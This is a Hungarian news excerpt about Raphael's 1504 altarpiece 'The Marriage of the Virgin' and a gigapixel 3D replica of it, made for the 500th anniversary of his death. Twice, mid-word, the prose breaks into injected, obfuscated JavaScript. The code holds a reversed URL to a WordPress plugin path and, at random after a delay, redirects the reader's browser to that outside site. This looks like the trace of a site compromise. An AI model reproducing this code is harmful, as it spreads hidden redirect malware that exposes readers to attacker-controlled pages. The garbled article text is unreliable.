A nagy reneszánsz művész, Raffaello 1504-ben, 21 évesen festette a Cittá di Castelló-i Szent Ferenc-templomba, az Albizzini-család kápolnájába a Mária és József eljegyzését ábrázoló oltárképet, amely 1789-ben Napóleon katoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonáinak zsákmánya lett, majd a híres milánói képtárba került. Az alkotó halálának 500. évfordulója alkalmából háromdimenziós technológiával elkészítették a kép rendkívül nagy felbontású másolatát, a készítők megfogalmazása szerint a klónját, amely a festmény legapróbb részletein, köztük az ecsetvonásokon, repedéseken, tökéletlenségeken túl visszaadja a kép anyagszerűségét is az úgynevezett gigapixel + 3d-technikának köszönhetően. A „klónozást” végző Haltadefinizione és Franco Cosimo Panini Editoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore olasz cégek szerint a több millió pixelből álló, 1,13 terabájt méretű…
A cikk folytatódik: http://kulturmozaik.co.hu/program/2020/12/23/masolatban-legalabb-hazater-a-festmeny.html
- Hirdetés -